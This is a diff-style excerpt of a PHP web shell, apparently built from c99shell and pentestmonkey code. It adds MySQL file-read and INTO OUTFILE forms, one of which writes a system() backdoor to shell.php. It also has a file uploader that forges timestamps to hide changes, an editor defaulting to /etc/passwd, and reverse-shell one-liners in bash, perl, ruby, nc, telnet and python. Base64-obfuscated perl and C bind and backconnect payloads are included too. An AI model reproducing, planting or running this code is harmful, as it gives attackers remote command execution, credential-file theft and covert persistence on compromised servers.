+   echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">user <input name="user" type="text" maxlength="500" size="10" value="'.$user.'"> password <input name="pass" type="text" maxlength="500" size="10" value="'.$pass.'"> host <input name="host" type="text" maxlength="500" size="10" value="'.$host.'">:<input name="port" type="text" maxlength="5" size="5" value="'.$port.'"> database <input name="db" type="text" maxlength="500" size="10" value="'.$db.'"><font color="gray">(needed for `load data infile`)</font><br><input name="wut" value="load_file" type="radio" checked>load_file<br><input name="wut" value="infile" type="radio">load data infile <font color="gray">(use it for binary files)</font><br><input name="file" type="text" maxlength="500" size="40" value="'.$file.'"> <input type="submit" value="go"><input name="sqlr" type="hidden" value="yup"><br><input name="p" type="hidden" value="f"></form>';
+   if (!empty($_POST["sqlr"])) {
+    $link=mysql_connect("".$host.":".$port."",$user,$pass) or die("cant connect: ".mysql_error()."".$pageend."");
+    switch ($_POST['wut']) {
+    case "load_file":
+     $q='SELECT load_file("'.$_POST["file"].'")';
+     $rez=mysql_query($q,$link) or die("query error:".mysql_error()."".$pageend."");
+     echo "result:<br>";
+     echo "<textarea cols=\"80\" rows=\"20\">";
+     echo mysql_result($rez,0);
+     echo "</textarea><br>";
+     echo $pageend;
+     die();
+     break;
+    case "infile":
+     mysql_select_db($db) or die ("cannot select db: ".mysql_error()."".$pageend."");
+     mysql_query("CREATE TABLE `file` ( `text` LONGBLOB NOT NULL );") or die ("cannot create table: ".mysql_error()."".$pageend.""); 
+     mysql_query("LOAD DATA INFILE \"".$_POST["file"]."\" INTO TABLE file LINES TERMINATED BY '' (`text`)") or die ("cannot load data: ".mysql_error()."".$pageend."");
+     $rez=mysql_query("SELECT * FROM file;");
+     if (!$rez) { echo "fail. permission denied?<br>"; }
+     else {
+      for ($i=0;$i<mysql_num_fields($rez);$i++) {$name = mysql_field_name($rez,$i);}
+      $f = "";
+      while ($row = mysql_fetch_array($rez, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+      if (empty($f)) {
+       echo "file does not exists or empty?<br>";
+      } else {
+       echo "result:<br>";
+       // code from c99shell madnet edition
+       $n = 0;
+       $a0 = "00000000<br>";
+       $a1 = "";
+       $a2 = "";
+       for ($i=0; $i<strlen($f); $i++) {
+        $a1 .= sprintf("%02X",ord($f[$i]))." ";
+        switch (ord($f[$i])) {
+         case 0:  $a2 .= "<font>0</font>"; break;
+         case 32:
+         case 10:
+         case 13: $a2 .= "&nbsp;"; break;
+         default: $a2 .= htmlspecialchars($f[$i]);
+        }
+        $n++;
+        if ($n == 24) {
+         $n = 0;
+         if ($i+1 < strlen($f)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+         $a1 .= "<br>";
+         $a2 .= "<br>";
+        }
+       }
+       echo '<table border=0 cellspacing="1" cellpadding="4"><tr><td>'.$a0.'</td><td>'.$a1.'</td><td>'.$a2.'</td></tr></table><br>';
+      }
+      mysql_free_result($result);
+      mysql_query("DROP TABLE file;") or die("cannot drop table: ".mysql_error()."".$pageend."");
+     }
+     echo $pageend;
+     die();
+    break;
+    }
+   mysql_close($link);
+   }
+  }
+  // mysql read file end. upload
+   if ($download != "1" and empty($_POST["edt"])) {
+    echo '<br><font color="blue">---> upload file</font><br>';
+    if (!ini_get('file_uploads')) {
+     echo "php file_uploads Off<br>";
+    } else {
+     echo "<font color=\"gray\">post_max_size: ".ini_get('post_max_size')."<br>"; 
+     echo "upload_max_filesize: ".ini_get('upload_max_filesize')."<br>"; 
+     echo "</font>";
+     if (is_writable("./")) {
+      echo "<font color=\"green\">./ writable</font>";
+     } else {
+      echo "<font color=\"red\">./ readonly</font>";
+     }
+     if (!isset($_POST["dir"])) {
+      $upto=".";
+     } else {
+      $upto=$_POST["dir"];
+     }
+     echo '<form enctype="multipart/form-data" action="'.$_SERVER['PHP_SELF'].'" method="post"><input name="sourcefile" type="file"> upload to <font color="gray">(dir)</font><input name="filedir" type="text" maxlength="500" size="20" value="'.$upto.'"><font color="green">/</font><input name="upname" type="text" maxlength="500" size="20" value=""><font color="gray">(name. empty = use original file`s name)</font> <input name="upload" type="hidden" value="okz"><input name="p" type="hidden" value="f"><br><input type="submit" value="upload">';
+     echo '</form>';
+     if (!empty($_POST["upload"])) {
+      if(is_uploaded_file($_FILES["sourcefile"]["tmp_name"]))
+      {
+       echo "upload ok";
+       $dirtime=filemtime($_POST['filedir']);
+       if (!empty($_POST["upname"])) {
+        $upname=$_POST["upname"];
+       } else {
+        $upname=$_FILES["sourcefile"]["name"];
+       }
+       move_uploaded_file($_FILES["sourcefile"]["tmp_name"], $_POST['filedir']."/".$upname) or die("<br>moving failed!<br>".$pageend."");
+       echo "<br>moving done, trying to touch (old time of ".$_POST['filedir']." = ".date("d/m/Y H:i:s",$dirtime).")<br>";
+       touch($_POST['filedir']."/".$upname,$dirtime,$dirtime) or die ("<br>touch failed!<br>".$pageend."");
+       echo "file touched: new time of ".$upname." = ".date("d/m/Y H:i:s",filemtime($_POST['filedir']."/".$upname)).". trying to touch dir<br>";
+       touch($_POST['filedir'],$dirtime,$dirtime) or die ("<br>touch dir failed!<br>".$pageend."");
+       echo "dir touched: new time of ".$_POST['filedir']." = ".date("d/m/Y H:i:s",filemtime($_POST['filedir']))."<br>";
+      } else {
+       echo("<br>upload failed!<br>");
+      }
+     }
+    }
+    if ($download != "1" and empty($_POST["edt"])) {
+     echo "<br>mysql:<br>";
+     if (empty($_POST["sqlu"])) {
+      $user="root";
+      $pass="12345";
+      $db="test";
+      $host="localhost";
+      $port="3306";
+      if (empty($_POST["dir"])) {
+       $dir=getcwd();
+      } else {
+       $dir=$_POST["dir"];
+      }
+      $file=$dir."/shell.php";
+      $evilcodez='<?php system($_GET["command"]); ?>';
+     } else {
+      $user=$_POST['user'];
+      $pass=$_POST['pass'];
+      $db=$_POST['db'];
+      $host=$_POST['host'];
+      $port=$_POST['port'];
+      $file=$_POST['file'];
+      $evilcodez=$_POST['evilcodez'];
+     }
+     echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">user <input name="user" type="text" maxlength="500" size="10" value="'.$user.'"> password <input name="pass" type="text" maxlength="500" size="10" value="'.$pass.'"> host <input name="host" type="text" maxlength="500" size="10" value="'.$host.'">:<input name="port" type="text" maxlength="5" size="5" value="'.$port.'"><br> select <br><textarea name="evilcodez" cols="80" rows="4">'.$evilcodez.'</textarea><br>into outfile <input name="file" type="text" maxlength="500" size="40" value="'.$file.'"> <input type="submit" value="go"><input name="sqlu" type="hidden" value="yup"><br><input name="p" type="hidden" value="f"></form>';
+    }
+    if (!empty($_POST["sqlu"])) {
+     $link=mysql_connect("".$host.":".$port."",$user,$pass) or die("cant connect: ".mysql_error()."".$pageend."");
+     $q='SELECT \''.mysql_real_escape_string($_POST['evilcodez']).'\' INTO OUTFILE "'.$_POST["file"].'"';
+     $rez=mysql_query($q,$link) or die("query error:".mysql_error());
+     echo "done<br>";
+     mysql_close($link);
+     echo $pageend;
+     die();
+    }
+    echo "<br>";
+    echo '<font color="blue">---> edit file</font><br>';
+    if (!empty($_POST["edit"])) {
+     $filee=trim($_POST["filee"]);
+     $files=trim($_POST["files"]);
+    } else {
+     $filee="/etc/passwd";
+     if (empty($_POST["dir"])) {
+      $dir="./";
+     } else {
+      $dir=$_POST["dir"]."/";
+     }
+     $files=$dir."cache.txt";
+    }
+    echo '<form name="editor" method="post" action="'.$_SERVER['PHP_SELF'].'"><input name="filee" type="text" maxlength="500" size="30" value="'.$filee.'"> save as <input name="files" type="text" maxlength="500" size="30" value="'.$files.'"> <input type="submit" value="go"><input name="edt" type="hidden" value="ok"><input name="edit" type="hidden" value="edit"><input name="p" type="hidden" value="f"><br></form>';
+   }
+   if (!empty($_POST["edit"])) {
+    $filee=trim($_POST["filee"]);
+    $oldtime=@filemtime($filee);
+    $files=trim($_POST["files"]);
+    if (!file_exists($files)) {
+     if (!fopen($files,'a+')) {
+      echo '<font color="red">'.$files.' isnt writable! (cannot open "a+")<br></font>'; echo $pageend; die();
+     } else {
+      if (!file_exists($filee)) {
+       echo '<font color="gray"> no file '.$filee.', I`ll create new '.$files.'.</font><br>';
+      } else {
+       echo '<font color="gray"> no file '.$files.', I`ll create new '.$files.'.</font><br>';
+      }
+      fclose($files);
+      unlink($files);
+     }
+    } else {
+     if (!is_writable($files)) {
+      $chmoded=substr(sprintf('%o',fileperms($files)), -4);
+      echo '<font color="gray">'.$files.' chmod '.$chmoded.', trying to chmod 0666</font>';
+      chmod($files, 0666) or die ('<font color="red"><br>cannot chmod '.$files.' 666!'.$pageend.'');
+      echo '<font color="gray"> ...done</font>';
+     }
+    }
+    if (!empty($_POST["edt"])) {
+     $filec=file_get_contents($filee);
+     if (empty($filec)) {
+      echo '<font color="red">cannot get '.$filee.' contents!</font>';
+     }
+     if (isset($_POST['filec'])) {
+      $filec=$_POST['filec'];
+      $fh=fopen($files,"w+") or die ('<font color="red">cannot fopen "w+"!</font>'.$pageend.'');
+      fputs($fh,$filec);
+      fclose($fh) or die ('<font color="red">cannot save file!</font>'.$pageend.'');
+      if (isset($_POST['chmoded'])) {
+       echo "chmoding to old perms(".trim($_POST['chmoded']).")<br>";
+       $perms = 0;
+       for($i=strlen($_POST['chmoded'])-1;$i>=0;--$i)
+       $perms+=(int)$_POST['chmoded'][$i]*pow(8, (strlen($_POST['chmoded'])-$i-1));
+       chmod($files, $perms);
+      }
+      $date=explode(" ",$_POST["touch"]);
+      $day=explode("-",$date[0]);
+      $time=explode(":",$date[1]);
+      $unixtime=mktime($time[0],$time[1],$time[2],$day[1],$day[2],$day[0]);
+      @touch($files,$unixtime,$unixtime);
+      die('<br><font color="green"> -&gt '.$files.' saved!</font>'.$pageend.'');
+     }
+     if (empty($oldtime)) {
+      $ttime=time();
+     } else {
+      $ttime=$oldtime;
+     }
+     echo '<form action="'.$_SERVER["PHP_SELF"].'" method="post">enter touch time: <input name="touch" type="text" maxlength="19" size="19" value="'.date("Y-m-d H:i:s",$ttime).'"><br><textarea cols="80" rows="20" name="filec">'.$filec.'</textarea><input name="filee" type="hidden" value="'.$filee.'"><input name="p" type="hidden" value="f"><input name="files" type="hidden" value="'.$files.'">';
+     if (isset($chmoded)) {
+      echo '<input name="chmoded" type="hidden" value="'.$chmoded.'">';
+     }
+     echo '<input name="edit" type="hidden" value="edit"><br><input type="submit" name="edt" value="save"></form>';
+    }
+    echo $pageend;
+    die();
+   }
+   if ($download != "1") {
+    echo '<br></div><font color="blue">---> fail manager</font><br>';
+   }
+   if ($action=="viewer") {
+    if (!isset($dir)) {
+     $dir=getcwd();
+    }
+    scandire($_POST["dir"]);
+   }
+   if ($action=="download") {
+    readfile($_POST["file"]);
+   }
+   if ($action=="chmod") {
+    chmodz($_POST["file"]);
+   }
+   if ($action=="touch") {
+    touchz($_POST["file"]);
+   }
+   if ($action == 'delete') {
+    if (unlink($_POST["file"])) $content.="file ".$_POST["file"]." deleted, <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$_POST["dir"]."'; document.reqs.submit();\">back</a>";
+   }
+   if ($action == 'deletedir') {
+    if (!rmrf($_POST["file"])) {
+     $content .="error deleting dir ".$_POST["file"].", <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$_POST["dir"]."'; document.reqs.submit();\">back</a>";
+    } else {
+     $content .="dir ".$_POST["file"]." deleted, <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$_POST["dir"]."'; document.reqs.submit();\">back</a>";
+    }
+   }
+   if (!empty($content)) {
+    echo $content;
+   }
+   if ($download != "1") {
+    echo '<br>';
+    echo '<form name="reqs" method="post" action="'.$_SERVER["PHP_SELF"].'"><input name="action" type="hidden" value=""><input name="dir" type="hidden" value=""><input name="file" type="hidden" value=""><input name="p" type="hidden" value="f"></form>';
+    echo $pageend;
+   }
+  break;
+// --------------------------------------------- file operations end; bind
+ case "b":
+  echo $title;
+  echo '<a href="#" onclick="showTooltip(1)" id="link"> &gt;&gt; help &lt;&lt; </a>
+  <div id="1" style="background-color: #bbbbbb; color: #000000; position: absolute; border: 1px solid #FF0000; display: none">
+  you could get almost-interactive shell in bind/backconnect with help of these commands<br>
+  -&gt; if there is python on the server, run: <br>
+  python -c \'import pty; pty.spawn("/bin/bash")\'<br>
+  -&gt; ruby:<br>
+  ruby -rpty -e \'PTY.spawn("/bin/bash")do|i,o|Thread.new do loop do o.print STDIN.getc.chr end end;loop do print i.sysread(512);STDOUT.flush end end\'<br>
+  -&gt; expect:<br>
+  expect -c \'spawn sh;interact\'<br>
+  -&gt; policycoreutils package:<br>
+  open_init_pty bash<br><br>
+  //thanks to tex from rdot.org<br><br>
+  for backconnect you should use small one-liners coz there is no temporary file created. in case they fail, try usual "big" backconnects.<br><br>
+  //thanks to Bernardo Damele and pentestmonkey.net<br><br>
+  if your terminal is broken after using backconnect (i.e. it doesnt show what you type), run command: reset<br>
+  </div><br><br>';
+  if ($failflag=="1") {
+   echo "fail, at least one system function needed!<br><br>";
+  } else {
+   $nc='<font color="gray">(dont forget to setup nc <b>first</b>!)</font>';
+   $semi='<font color="gray">dont forget to write <b>;</b> at the end of command!</font>';
+   sploent516();
+   echo "<br>"; //debug: sometimes page cut here, when passthru system shell_exec are disabled
+   echo '<font color="green"> - - - - = = = = &gt; &gt; one-liners</font><br><a href="#" onclick="showTooltip(4)" id="link4"> &gt;&gt; show code &lt;&lt; </a>
+   <div id="4" style="background-color: #bbbbbb; color: #000000; position: absolute; border: 1px solid #FF0000; display: none"><textarea cols="80" rows="20">
+'.gzinflate(base64_decode("pZLRq5swFMbf/SsOIq0Bjbfdm6lCue1Axr2W6tsYpU3iKtUkJHZdWe/+9kVbmBv3YbAXT/IRv/NLvnPYm2PswNNiMpt/IPw7p2AXizRi/FvUURVlG7xcrfB2jYsi2uTbkoA5wnAc0uE7H4rjKK4ba9UXCF+yHEIOU08lldQn61x3QV35nkLEo4ngF8jyOC4kPfEujrPXdelvONdLxnTgjpvGfVMXkaJcZa9hWjGpuPA9Gmjr9HMsXBAxV9Px1tvB5Vg3fJGSqePo8+FqufoCoTZDx4GtZ4K6ggGQJuXz5o6DLZ3/B4MbuA+KwdenLUso/so7g0iWYzUQWDFwtYt+3Gp5o1jpWlh7iTXfszcumEURtAdpIawg6loVYUEFI9CehGQjBRRMJiAojBmgJ7BBjY7dIDrUIrJ5zNKR3AfiOB1vhH3af+93/+G/eqprd5SiH4JhASGFad0qqTu4v3tgzgelJeXGBNIQk9xlfC/+Y7f8uOsHInhsi/z5064ot+vli00YUykEp53/d0Q9K0JEGszOau4bXNmohPRR8IQIvCPP3pfniKjkNyem+6bxP7uPa9tRCGv3C7KT9Qs=")).'</textarea></div><br>';
+   echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">backconnect to <input name="ip" type="text" maxlength="15" size="15" value="123.123.123.123">:<input name="port" type="text" maxlength="5" size="5" value="1337"><input name="p" type="hidden" value="b"> using <br>';
+   $searchvar=trim(search("bash",$failflag));
+   if (empty($searchvar)) {
+    echo "fail, no bash here<font color=\"gray\"> (lolwut?)</font><br>";
+   } else {
+    echo ' bash <input name="wut" value="bash" type="radio" checked><br>'; 
+   }
+   $searchvar=trim(search("perl",$failflag));
+   if (empty($searchvar)) {
+    echo "fail, no perl here<br>";
+   } else {
+    echo ' perl <input name="wut" value="perl" type="radio"><br>';
+   }
+   $searchvar=trim(search("ruby",$failflag));
+   if (empty($searchvar)) {
+    echo "fail, no ruby here<br>";
+   } else {
+    echo ' ruby <input name="wut" value="ruby" type="radio"><br>';
+   }
+   $searchvar=trim(search("nc",$failflag));
+   if (empty($searchvar)) {
+    echo "fail, no nc here<br>";
+   } else {
+    echo ' nc <input name="wut" value="nc" type="radio"><br>';
+   }
+   $searchvar=trim(search("telnet",$failflag));
+   if (empty($searchvar)) {
+    echo "fail, no telnet here<br>";
+   } else {
+    echo ' telnet <input name="wut" value="telnet" type="radio"><br>';
+   }
+   $searchvar=trim(search("python",$failflag));
+   if (empty($searchvar)) {
+    echo "fail, no python here<br>";
+   } else {
+    echo ' python <input name="wut" value="python" type="radio"><br>';
+   }
+   echo '<br><input type="hidden" name="oneline" value="oneline"><input type="submit" value="go"></form><br>';
+   if (!empty($_POST["oneline"])) {
+    switch ($_POST["wut"]) {
+     case "bash":
+      $c='0<&123;exec 123<>/dev/tcp/'.$_POST["ip"].'/'.$_POST["port"].'; sh <&123 >&123 2>&123';
+      run($c);
+      echo "done<br>";
+     break;
+     case "perl":
+      $c='perl -MIO -e \'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"'.$_POST['ip'].':'.$_POST['port'].'");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'';
+      run($c);
+      echo "done<br>";
+     break;
+     case "ruby":
+      $c='ruby -rsocket -e \'exit if fork;c=TCPSocket.new("'.$_POST['ip'].'","'.$_POST['port'].'");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end\'';
+      run($c);
+      echo "done<br>";
+     break;
+     case "nc":
+      $c='rm -f /tmp/.ncnd; mknod /tmp/.ncnd p && nc '.$_POST['ip'].' '.$_POST['port'].' 0</tmp/.ncnd | /bin/sh 1>/tmp/.ncnd 2>&1';
+      run($c);
+      echo "done<br>";
+     break;
+     case "telnet":
+      $c='rm -f /tmp/.ncnd; mknod /tmp/.ncnd p && telnet '.$_POST['ip'].' '.$_POST['port'].' 0</tmp/.ncnd | /bin/sh 1>/tmp/.ncnd 2>&1';
+      run($c);
+      echo "done<br>";
+     break;
+     case "python":
+      $c='python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'.$_POST['ip'].'",'.$_POST['port'].'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'';
+      run($c);
+      echo "done<br>";
+     break;
+    }
+   }
+   echo '<font color="green">- - - - = = = = &gt; &gt; classic</font><br>';
+   echo '<font color="blue">---> PHP </font><br>';
+   if (!function_enabled('set_time_limit')) { echo '<font color="gray">warning! set_time_limit off!</font><br>'; }
+   if (!function_enabled('ignore_user_abort')) { echo '<font color="gray">warning! ignore_user_abort off!</font><br>'; }
+   echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">bind local port <input name="port" type="text" maxlength="5" size="5" value="1337"> <input type="submit" value="go"><br>'.$semi.'<input name="p" type="hidden" value="b"><input name="shellz" type="hidden" value="phplocal"></form>';
+   if (function_enabled('fsockopen')) {
+    if (function_enabled('proc_open')) {
+     echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">backconnect to <input name="ip" type="text" maxlength="15" size="15" value="123.123.123.123">:<input name="port" type="text" maxlength="5" size="5" value="1337"> <input type="submit" value="go"><br>'.$nc.'<input name="p" type="hidden" value="b"><input name="shellz" type="hidden" value="phpremote"></form><br>';
+    } else { echo 'fail, proc_open is needed for backconnect!<br><br>'; }
+   } else { echo 'fail, fsockopen is needed for backconnect!<br><br>'; }
+   //php end
+   echo '<font color="blue">---> PERL </font><br>';
+   $searchvar=trim(search("perl",$failflag));
+   if (empty($searchvar)) {
+    echo "fail, no perl here<br>";
+   } else {
+    echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">bind local port <input name="port" type="text" maxlength="5" size="5" value="1337"> saving file to <input name="path" type="text" maxlength="500" size="10" value="./.bd"> <input type="submit" value="go"><input name="shellz" type="hidden" value="perllocal"><input name="p" type="hidden" value="b"> ';
+    if (is_writable("./")) {
+     echo "<font color=\"green\">(./ writable)</font>";
+    } else {
+     echo "<font color=\"red\">(./ readonly)</font>";
+    }
+    echo '<br>'.$semi.'</form>';
+    echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">backconnect to <input name="ip" type="text" maxlength="15" size="15" value="123.123.123.123">:<input name="port" type="text" maxlength="5" size="5" value="1337"> saving file to <input name="path" type="text" maxlength="500" size="10" value="./.bc"> <input type="submit" value="go"><input name="shellz" type="hidden" value="perlremote"><input name="p" type="hidden" value="b"><br>'.$nc.'<br></form>';
+   }
+   //perl end
+   echo "<br>";
+   echo '<font color="blue">---> PYTHON </font><br>';
+   $searchvar=trim(search("python",$failflag));
+   if (empty($searchvar)) {
+    echo "fail, no python here<br>";
+   } else {
+    echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">bind local port <input name="port" type="text" maxlength="5" size="5" value="1337"> saving file to <input name="path" type="text" maxlength="500" size="10"  value="./.bd"> <input type="submit" value="go"><input name="shellz" type="hidden" value="pylocal"><input name="p" type="hidden" value="b"> ';
+    if (is_writable("./")) {
+     echo "<font color=\"green\">(./ writable)</font>";
+    } else {
+     echo "<font color=\"red\">(./ readonly)</font>";
+    }
+    echo '<br>'.$semi.'</form>';
+    echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">backconnect to <input name="ip" type="text" maxlength="15" size="15" value="123.123.123.123">:<input name="port" type="text" maxlength="5" size="5" value="1337"> saving file to <input name="path" type="text" maxlength="500" size="10" value="./.bc"> <input type="submit" value="go"><input name="p" type="hidden" value="b"><input name="shellz" type="hidden" value="pyremote"><br>'.$nc.'<br></form>';
+    echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">fully interactive backconnect to <input name="ip" type="text" maxlength="15" size="15" value="123.123.123.123">:<input name="port" type="text" maxlength="5" size="5" value="1337"> saving file to <input name="path" type="text" maxlength="500" size="10" value="./.bc"> <input type="submit" value="go"><input name="p" type="hidden" value="b"><input name="shellz" type="hidden" value="pyint"><br></form>';
+    echo '<font color="gray">you need to run special client first: <a href="#" onclick="showTooltip(2)" id="link2"> &gt;&gt; show code &lt;&lt; </a><br>with this one you will be able to run mc, top, vim, etc</font>
+    <div id="2" style="background-color: #bbbbbb; color: #000000; position: absolute; border: 1px solid #FF0000; display: none">';
+    echo '<br>usage: python client.py [host] [port], then input there ^^^^ your host and port.<br>do not remove whitespace!<br>if you see "TERM is not set", run command: export TERM=linux<br>//thanks to ont.rif for interactive backconnect<br>';
+    echo "<textarea cols=\"80\" rows=\"20\">";
+    echo gzinflate(base64_decode('dVLBbhoxFLzvV0ypUHcly5BWvaDmEKVEQm1BKhv1sEFou/sAKxsb2U4Ifx8/mySEKAfWsj0zb2bM58G9s4P/Sg9IP2C79xujM3W3NdbDmeaWvMDW7wU8fxx11IQTt3cCxmVqhY50zntZ2/UDCvzAt1GGrVXao3ft6jWN0HeoNsb5BSoWXvTQxyupGi5QZNQ5CkSG4RzO2yPAGQMQPZ0jCB9dfY1X7JRZ0bBMS/68vbhaTqbjUjzv57PLX8t5+Xd88Ye53u7D3HgpQw9tjpxNiDivYES665TznPU7H9FjQ1vPvEPSy1p/8WA+Pt3oXsZ9SUfe1rucC5Tz8udkurya/B5PZ6yw26iOUNp7OlL5Vyuv9BorY0POxtzxxuhQ4KjvpJQ3NlZ35C9w84b9CdRta4tDC7Ju2GBevGrPboNA3yWJ2C8TYr63XmAFdgLEUvG9ZVpyVIij5CrAtckL8T7ZQqCKvyiM8Ad5SwmxYOMUtDU/p3HSUh1aP5U+Gw6HSYQxO6s8vTQ5uy4PA0WUSbAwTBvPB2nAy9t0isLadMZRi8ZoHdIoo0MVCUePKlXFEu8ifej4FPmB59NgyfAT'));
+    echo "</textarea><br>";
+    echo '</div><br>';
+   }
+   //python end
+   echo "<br>";
+   echo '<font color="blue">---> C </font><br>';
+   $searchvar=trim(search("gcc",$failflag));
+   if (empty($searchvar)) {
+    echo "fail, no gcc here<br>";
+   } else {
+    echo '<font color="gray">don\'t remove ".c" file extension! compiler= '.$searchvar.'</font><br>';
+    echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">bind local port <input name="port" type="text" maxlength="5" size="5" value="1337"> saving file to <input name="path" type="text" maxlength="500" size="10" value="./.bd.c"><input type="submit" value="go"><input name="p" type="hidden" value="b"><input name="shellz" type="hidden" value="clocal"> ';
+    if (is_writable("./")) {
+     echo "<font color=\"green\">(./ writable)</font>";
+    } else {
+     echo "<font color=\"red\">(./ readonly)</font>";
+    }
+    echo '<br>'.$semi.'</form>';
+    echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">backconnect to <input name="ip" type="text" maxlength="15" size="15" value="123.123.123.123">:<input name="port" type="text" maxlength="5" size="5" value="1337"> saving file to <input name="path" type="text" maxlength="500" size="10" value="./.bc.c"><input type="submit" value="go"><input name="shellz" type="hidden" value="cremote"><input name="p" type="hidden" value="b"><br>'.$nc.'</form>';
+   }
+   //c end
+   echo "<br>";
+   echo '<font color="blue">---> PHP+C findsock </font><font color="gray">(likely wont work on modern php&amp;apache &gt;= 2009)</font><br>';
+   $searchvar=trim(search("gcc",$failflag));
+   if (empty($searchvar)) {
+    echo "fail, no gcc here<br>";
+   } else {
+    echo '<form method="post" action="'.$_SERVER['PHP_SELF'].'">compile findsock saving binary to: <input name="path" type="text" maxlength="500" size="10" value="./findsock"> <input name="p" type="hidden" value="b"><input type="submit" value="go"><input name="shellz" type="hidden" value="findsock"> <a href="#" onclick="showTooltip(3)" id="link3"> &gt;&gt; help &lt;&lt; </a>';
+    echo '<div id="3" style="background-color: #bbbbbb; color: #000000; position: absolute; border: 1px solid #FF0000; display: none">';
+    echo "first save and compile findsock binary, then connect to this shell via nc and specify the path to binary in the request, e.g. if you've saved binary in current dir, make such request: <br><br>h4x0r@localhost$ nc -v ".$_SERVER['SERVER_NAME']." 80 <br> GET ".$_SERVER['SCRIPT_NAME']."?pfs&amp;path=".getcwd()." HTTP/1.0 <br> Host:".$_SERVER['SERVER_NAME']."  &lt;press_Enter&gt;<br>&lt;press_Enter&gt;<br><br>and if findsock will succeed, you'll see a shell: <br> sh-3.2$<br><br>use nc, not telnet! do not forget to specify the correct path! <br>additional info: <br>https://bugs.php.net/bug.php?id=38915<br>https://issues.apache.org/bugzilla/show_bug.cgi?id=46425<br>http://pentestmonkey.net/tools/web-shells/php-findsock-shell<br><br></div>";
+    echo '</form><br><br>';
+   }
+  } //failcheck end
+  if (!empty($_POST["shellz"])) {
+   //code by security-teams.net
+   $perlbdcode='#!'.search("perl",$failflag).'
+   use IO::Socket::INET;
+   $server = IO::Socket::INET->new(
+   LocalPort => '.$_POST["port"].',';
+   $perlbdcode.=gzinflate(base64_decode('bY/RCoIwFIbve4rjiJhhSNemEGYQpYIadBFE6RFHpuKsiPDdc6ZB1C7G9n3/OdsBECt4FNgeQDfAd831wQ88a24rgzf18Mqx99OebhivMPtU2fOd6TrOW8qQlxAxpGR5ZClG0j4jsibcPWnudCyioMOQY3nDcmIcwxCLisqyyDzbJiymUpyX5w52FPKiedQPFitHASCzkehEtG/nbgMFiPHXWZ734/ijGeVCiXpimcqT7qtQt3uY5s30It7SevAC'));
+   //code by Michael Schierl
+   $perlbccode='#!'.search("perl",$failflag);
+   $perlbccode.="\n";
+   $perlbccode.=gzinflate(base64_decode('lVVtb5pQFP7OrzgaUiChFZxNVxlmru06006MspdkWRqESyVFIHDRNq3/fedeXoTGdZkm5rw859znnPuAeUZgYg2Hi9h9INQQcvQ/uxENDUG0J9bF9cyeggnHfX1wpp+fn5/2y8RiZt9e3GBK184GWv/0tK9j5mp8PZ5MTZ3ZX6yFbYrj+fX3X9pv9GfWvPJ15mtmNyI0ow7topchAewWkW2Dz3A4mV7ZIAszQtKx56VgjoA3VnloFqeUh1hvDKUxjZkvUTeRVOFTiF2C6J6FNFVQIE7BCwiIHUPInrI4IRHIM/vrTxWknkc2vYSuHyUVrLv55Y/5i3U3taafbq2Lm1alSNeJKUmGEMQuDasG9bbQREC7IqEZzpZHieM+yFIglRjM5BHjaO4TmlI2bvYtlo1OAW81d1dekCJ/qRnkoy3sy8m0Gi3Kw7AFyddO9gCaIXjEDyLiyWISeMjSj9P2AeQxoBD4wPL/RiNQ7rCkAs9YSly528uWQdRz7gmlT3AcwXEIPRZZOtkK3r0faBqU2896bFVd3rBV/H+1VWkN/NDCwKjt9kcHWjSnN4QdlJ96s9Y3G1c7Gh1eboW6ms/fQIlJgitk94x2GkSmuGU/BH+YvjY4BAurfhCSKMaVJ4qqK2DqB3Ls+SmygOmMhMSlwKPY+8Xcx8rjmqFinCoo4gUH2Yp4Joojy5fsjrdO6nkOdfBO108gi34ar1WRxuy4j3eGsF0hDVlndy6mGwzi45USxyuRIC5z31fxXdEfoL5DJ+OKkju1mtKNAkdHuBUwTShfI0pDbSz/SmX8IBMfGHiGmjMfH9gBxq5khfu5p6uCAow4fk9ymwaUyDhJzbEJV0o9v00T+0Xkkankr3zriUvSrw7BLWc0lQsGmsqrTWAa2PFvMUhnPyafIfLjPGITF9eIveOcmlwVIG65veU24TZhNhYQdmJBrKBU9cHXvI6pxnUzyamFtPYz1CReQRlMZRo9CN0Jbhjjn0shv8Ku5FlwZSxPuH3CJzGEPw=='));
+   //author/license unknown
+   $cbdcode=gzinflate(base64_decode('bVBha8IwEP3eX3FMmOns1H2uDoo6kDEV7ZexSejaVA9rKkkUq+y/75q6Drd9CHl59y737jVQxtk+EdDTJsG8vX50Gj8UrmSU/eIK3THFTui/tM7jjTDXvBQG6XRQljxKA6TiidCeBXGGFVBxdWdCEhDqIBTfYeIBKUrgO9qofWzbN1GSKI7S6nj58OG/MrUKaSqBHb2NiGUlitSKBsbrSMEd4cPb0nXOYEXoO2muGPa7PvZKnY+tlgtnZyu2Whhm5bj0mu/HbtOjsWT5m3Rd3/m0VuNdUZHdpXdDAWgTmRuqXraHPlRpseCJjyej0IPFdPDMF+F8FLx4MJ7N5tNwysPBzKXlMAVWd/bh/sEFRxzRMEJU/jgJlTNWrePCbZ0LRYknkaesZkqH9aOtUfI02mJWkKGLkzLLK0EF7EWqtcllxsaTYDic82DySv99AQ=='));
